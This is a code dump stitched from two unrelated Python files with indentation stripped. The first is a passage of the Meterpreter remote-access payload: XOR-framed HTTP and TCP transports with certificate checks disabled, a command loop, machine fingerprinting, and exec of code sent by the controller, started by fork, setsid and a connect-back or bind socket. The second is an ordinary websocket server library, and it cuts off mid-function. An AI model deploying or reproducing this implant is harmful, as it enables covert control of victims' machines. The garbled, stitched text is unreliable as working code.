raw = xor_key[::-1] + xor_bytes(xor_key, pkt)
self._send_packet(raw)
except:
return False
self.communication_last = time.time()
return True
def tlv_pack_timeouts(self):
response = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
return response
def tlv_pack_transport_group(self):
trans_group = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
trans_group += self.tlv_pack_timeouts()
return trans_group
class HttpTransport(Transport):
def __init__(self, url, proxy=None, user_agent=None):
super(HttpTransport, self).__init__()
opener_args = []
scheme = url.split(':', 1)[0]
if scheme == 'https' and (
(sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
import ssl
ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE
opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
if proxy:
opener_args.append(urllib.ProxyHandler({scheme: proxy}))
self.proxy = proxy
opener = urllib.build_opener(*opener_args)
if user_agent:
opener.addheaders = [('User-Agent', user_agent)]
self.user_agent = user_agent
urllib.install_opener(opener)
self.url = url
self._http_request_headers = {'Content-Type': 'application/octet-stream'}
self._first_packet = None
self._empty_cnt = 0
def _activate(self):
self._first_packet = None
packet = self._get_packet()
if packet is None:
return False
self._first_packet = packet
return True
def _get_packet(self):
if self._first_packet:
packet = self._first_packet
self._first_packet = None
return packet
packet = None
xor_key = None
request = urllib.Request(self.url, None, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
packet = url_h.read()
for _ in range(1):
if packet == '':
break
if len(packet) < 12:
packet = None # looks corrupt
break
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, _ = struct.unpack('>II', header)
if len(packet) - 4 != pkt_length:
packet = None # looks corrupt
if not packet:
delay = 10 * self._empty_cnt
if self._empty_cnt >= 0:
delay *= 10
self._empty_cnt += 1
time.sleep(float(min(10000, delay)) / 1000)
return packet
self._empty_cnt = 0
return xor_bytes(xor_key, packet[12:])
def _send_packet(self, packet):
request = urllib.Request(self.url, packet, self._http_request_headers)
url_h = urllib.urlopen(request, timeout=self.communication_timeout)
response = url_h.read()
def patch_uri_path(self, new_path):
match = re.match(r'https?://[^/]+(/.*$)', self.url)
if match is None:
return False
self.url = self.url[:match.span(1)[0]] + new_path
return True
def tlv_pack_transport_group(self):
trans_group = super(HttpTransport, self).tlv_pack_transport_group()
if self.user_agent:
trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
if self.proxy:
trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
return trans_group
class TcpTransport(Transport):
def __init__(self, url, socket=None):
super(TcpTransport, self).__init__()
self.url = url
self.socket = socket
self._cleanup_thread = None
self._first_packet = True
def _sock_cleanup(self, sock):
remaining_time = self.communication_timeout
while remaining_time > 0:
iter_start_time = time.time()
if select.select([sock], [], [], remaining_time)[0]:
if len(sock.recv(4096)) == 0:
break
remaining_time -= time.time() - iter_start_time
sock.close()
def _activate(self):
address, port = self.url[6:].rsplit(':', 1)
port = int(port.rstrip('/'))
timeout = max(self.communication_timeout, 30)
if address in ('', '0.0.0.0', '::'):
try:
server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.bind(('', port))
server_sock.listen(1)
if not select.select([server_sock], [], [], timeout)[0]:
server_sock.close()
return False
sock, _ = server_sock.accept()
server_sock.close()
else:
if ':' in address:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((address, port))
sock.settimeout(None)
self.socket = sock
self._first_packet = True
return True
def _deactivate(self):
cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
cleanup.run()
self.socket = None
def _get_packet(self):
first = self._first_packet
self._first_packet = False
if not select.select([self.socket], [], [], 0.5)[0]:
return ''
packet = self.socket.recv(12)
if packet == '': # remote is closed
self.request_retire = True
return None
if len(packet) != 12:
if first and len(packet) == 4:
received = 0
header = packet[:4]
pkt_length = struct.unpack('>I', header)[0]
self.socket.settimeout(max(self.communication_timeout, 30))
while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert (isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
self.debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
self.debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
self.debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
bind_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bind_sock.bind(('0.0.0.0', BINDPORT))
bind_sock.listen(1)
s, address = bind_sock.accept()
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
sys.exit(retCode)
|
websocket_server.py
|
# Author: Johan Hanssen Seferidis
# License: MIT
import sys
import struct
import ssl
from base64 import b64encode
from hashlib import sha1
import logging
from socket import error as SocketError
import errno
import threading
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler
from websocket_server.thread import WebsocketServerThread
logger = logging.getLogger(__name__)
logging.basicConfig()
'''
+-+-+-+-+-------+-+-------------+-------------------------------+
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-------+-+-------------+-------------------------------+
|F|R|R|R| opcode|M| Payload len | Extended payload length |
|I|S|S|S| (4) |A| (7) | (16/64) |
|N|V|V|V| |S| | (if payload len==126/127) |
| |1|2|3| |K| | |
+-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +
| Extended payload length continued, if payload len == 127 |
+ - - - - - - - - - - - - - - - +-------------------------------+
| Payload Data continued ... |
+---------------------------------------------------------------+
'''
FIN = 0x80
OPCODE = 0x0f
MASKED = 0x80
PAYLOAD_LEN = 0x7f
PAYLOAD_LEN_EXT16 = 0x7e
PAYLOAD_LEN_EXT64 = 0x7f
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE_CONN = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xA
CLOSE_STATUS_NORMAL = 1000
DEFAULT_CLOSE_REASON = bytes('', encoding='utf-8')
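# Illustrative sketch (not part of the original module): how the constants above map onto the
# frame diagram. A short, unmasked server-to-client text frame is just two header bytes
# (FIN | opcode, then a 7-bit payload length with the MASK bit clear) followed by the payload,
# which is what send_text() below builds; client-to-server payloads arrive masked and are
# recovered by XOR-ing each byte with the rotating 4-byte key, as read_next_message() does.
# The helper name and the sample masking key are arbitrary examples.
def _demo_frame_roundtrip():
    payload = 'hello'.encode('utf-8')
    assert len(payload) <= 125  # short-frame case only; longer payloads need the extended length fields
    frame = bytes([FIN | OPCODE_TEXT, len(payload)]) + payload
    masks = b'\x01\x02\x03\x04'  # example 4-byte masking key a client might send
    masked = bytearray(b ^ masks[i % 4] for i, b in enumerate(payload))
    unmasked = bytes(bytearray(b ^ masks[i % 4] for i, b in enumerate(masked)))
    return frame, unmasked == payload  # applying the mask twice restores the original payload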
class API():
def run_forever(self, threaded=False):
return self._run_forever(threaded)
def new_client(self, client, server):
pass
def client_left(self, client, server):
pass
def message_received(self, client, server, message):
pass
def set_fn_new_client(self, fn):
self.new_client = fn
def set_fn_client_left(self, fn):
self.client_left = fn
def set_fn_message_received(self, fn):
self.message_received = fn
def send_message(self, client, msg):
self._unicast(client, msg)
def send_message_to_all(self, msg):
self._multicast(msg)
def shutdown_gracefully(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
self._shutdown_gracefully(status=status, reason=reason)
def shutdown_abruptly(self):
self._shutdown_abruptly()
class WebsocketServer(ThreadingMixIn, TCPServer, API):
"""
A websocket server waiting for clients to connect.
Args:
port(int): Port to bind to
host(str): Hostname or IP address to listen on. 127.0.0.1 is used by
default; to accept connections from any client, use 0.0.0.0.
loglevel: Logging level from the logging module. By default only
warnings and errors are logged.
Properties:
clients(list): A list of connected clients. A client is a dictionary
like below.
{
'id' : id,
'handler' : handler,
'address' : (addr, port)
}
"""
allow_reuse_address = True
daemon_threads = True  # set to False (or comment this line out) to keep handler threads alive until they finish
def __init__(self, port, host='127.0.0.1', loglevel=logging.WARNING, key=None, cert=None):
logger.setLevel(loglevel)
TCPServer.__init__(self, (host, port), WebSocketHandler)
self.port = self.socket.getsockname()[1]
self.key = key
self.cert = cert
self.clients = []
self.id_counter = 0
self.thread = None
def _run_forever(self, threaded):
cls_name = self.__class__.__name__
try:
logger.info("Listening on port %d for clients.." % self.port)
if threaded:
self.daemon = True
self.thread = WebsocketServerThread(target=super().serve_forever, daemon=True, logger=logger)
logger.info(f"Starting {cls_name} on thread {self.thread.getName()}.")
self.thread.start()
else:
self.thread = threading.current_thread()
logger.info(f"Starting {cls_name} on main thread.")
super().serve_forever()
except KeyboardInterrupt:
self.server_close()
logger.info("Server terminated.")
except Exception as e:
logger.error(str(e), exc_info=True)
sys.exit(1)
def _message_received_(self, handler, msg):
self.message_received(self.handler_to_client(handler), self, msg)
def _ping_received_(self, handler, msg):
handler.send_pong(msg)
def _pong_received_(self, handler, msg):
pass
def _new_client_(self, handler):
self.id_counter += 1
client = {
'id': self.id_counter,
'handler': handler,
'address': handler.client_address
}
self.clients.append(client)
self.new_client(client, self)
def _client_left_(self, handler):
client = self.handler_to_client(handler)
self.client_left(client, self)
if client in self.clients:
self.clients.remove(client)
def _unicast(self, receiver_client, msg):
receiver_client['handler'].send_message(msg)
def _multicast(self, msg):
for client in self.clients:
self._unicast(client, msg)
def handler_to_client(self, handler):
for client in self.clients:
if client['handler'] == handler:
return client
def _terminate_client_handlers(self):
"""
Ensures the request handler for each client is terminated correctly
"""
for client in self.clients:
client["handler"].keep_alive = False
client["handler"].finish()
client["handler"].connection.close()
def _shutdown_gracefully(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
"""
Send a CLOSE handshake to all connected clients before terminating the server
"""
self.keep_alive = False
# Send CLOSE to clients
for client in self.clients:
client["handler"].send_close(status, reason)
self._terminate_client_handlers()
self.server_close()
self.shutdown()
def _shutdown_abruptly(self):
"""
Terminate the server without sending a CLOSE handshake
"""
self.keep_alive = False
self._terminate_client_handlers()
self.server_close()
self.shutdown()
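# Illustrative usage sketch (not part of the original module), based on the API mixin and the
# class docstring above: register callbacks, then serve. The port number, messages and callback
# bodies are arbitrary examples; client_left handling is omitted for brevity.
def _demo_run_server(port=9001):
    def new_client(client, server):
        # 'client' is the dict described in the class docstring: id / handler / address
        server.send_message(client, "Welcome, client #%d" % client['id'])
    def message_received(client, server, message):
        server.send_message_to_all(message)  # naive echo/broadcast to every connected client
    server = WebsocketServer(port, host='127.0.0.1', loglevel=logging.INFO)
    server.set_fn_new_client(new_client)
    server.set_fn_message_received(message_received)
    server.run_forever()  # blocks; pass threaded=True to serve on a background thread instead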
class WebSocketHandler(StreamRequestHandler):
def __init__(self, socket, addr, server):
self.server = server
if server.key and server.cert:
try:
socket = ssl.wrap_socket(socket, server_side=True, certfile=server.cert, keyfile=server.key)
except Exception: # wrap_socket fails e.g. when the key/cert files are missing or invalid
logger.warning("SSL not available (are the paths {} and {} correct for the key and cert?)".format(server.key, server.cert))
StreamRequestHandler.__init__(self, socket, addr, server)
def setup(self):
StreamRequestHandler.setup(self)
self.keep_alive = True
self.handshake_done = False
self.valid_client = False
def handle(self):
while self.keep_alive:
if not self.handshake_done:
self.handshake()
elif self.valid_client:
self.read_next_message()
def read_bytes(self, num):
return self.rfile.read(num)
def read_next_message(self):
try:
b1, b2 = self.read_bytes(2)
except SocketError as e: # to be replaced with ConnectionResetError for py3
if e.errno == errno.ECONNRESET:
logger.info("Client closed connection.")
self.keep_alive = 0
return
b1, b2 = 0, 0
except ValueError as e:
b1, b2 = 0, 0
fin = b1 & FIN
opcode = b1 & OPCODE
masked = b2 & MASKED
payload_length = b2 & PAYLOAD_LEN
if opcode == OPCODE_CLOSE_CONN:
logger.info("Client asked to close connection.")
self.keep_alive = 0
return
if not masked:
logger.warning("Client must always be masked.")
self.keep_alive = 0
return
if opcode == OPCODE_CONTINUATION:
logger.warning("Continuation frames are not supported.")
return
elif opcode == OPCODE_BINARY:
logger.warning("Binary frames are not supported.")
return
elif opcode == OPCODE_TEXT:
opcode_handler = self.server._message_received_
elif opcode == OPCODE_PING:
opcode_handler = self.server._ping_received_
elif opcode == OPCODE_PONG:
opcode_handler = self.server._pong_received_
else:
logger.warning("Unknown opcode %#x." % opcode)
self.keep_alive = 0
return
if payload_length == 126:
payload_length = struct.unpack(">H", self.rfile.read(2))[0]
elif payload_length == 127:
payload_length = struct.unpack(">Q", self.rfile.read(8))[0]
masks = self.read_bytes(4)
message_bytes = bytearray()
for message_byte in self.read_bytes(payload_length):
message_byte ^= masks[len(message_bytes) % 4]
message_bytes.append(message_byte)
opcode_handler(self, message_bytes.decode('utf8'))
def send_message(self, message):
self.send_text(message)
def send_pong(self, message):
self.send_text(message, OPCODE_PONG)
def send_close(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
"""
Send CLOSE to client
Args:
status: Status as defined in https://datatracker.ietf.org/doc/html/rfc6455#section-7.4.1
reason: Text describing the reason for closing the connection
"""
if status < CLOSE_STATUS_NORMAL or status > 1015:
raise Exception(f"CLOSE status must be between 1000 and 1015, got {status}")
header = bytearray()
payload = struct.pack('!H', status) + reason
payload_length = len(payload)
assert payload_length <= 125, "We only support short closing reasons at the moment"
# Send CLOSE with status & reason
header.append(FIN | OPCODE_CLOSE_CONN)
header.append(payload_length)
self.request.send(header + payload)
def send_text(self, message, opcode=OPCODE_TEXT):
"""
Important: fragmented (continuation) messages are not supported, since
their use cases are limited - chiefly when the payload length is not known up front.
"""
# Validate message
if isinstance(message, bytes):
message = try_decode_UTF8(message) # this is slower but ensures we have UTF-8
if not message:
logger.warning("Can\'t send message, message is not valid UTF-8")
return False
elif not isinstance(message, str):
logger.warning('Can\'t send message, message has to be a string or bytes. Got %s' % type(message))
return False
header = bytearray()
payload = encode_to_UTF8(message)
payload_length = len(payload)
# Normal payload
if payload_length <= 125:
header.append(FIN | opcode)
header.append(payload_length)
# Extended payload
elif payload_length >= 126 and payload_length <= 65535:
header.append(FIN | opcode)
header.append(PAYLOAD_LEN_EXT16)
header.extend(struct.pack(">H", payload_length))
# Huge extended payload
elif payload_length < 18446744073709551616:
header.append(FIN | opcode)
header.append(PAYLOAD_LEN_EXT64)
header.extend(struct.pack(">Q", payload_length))
else:
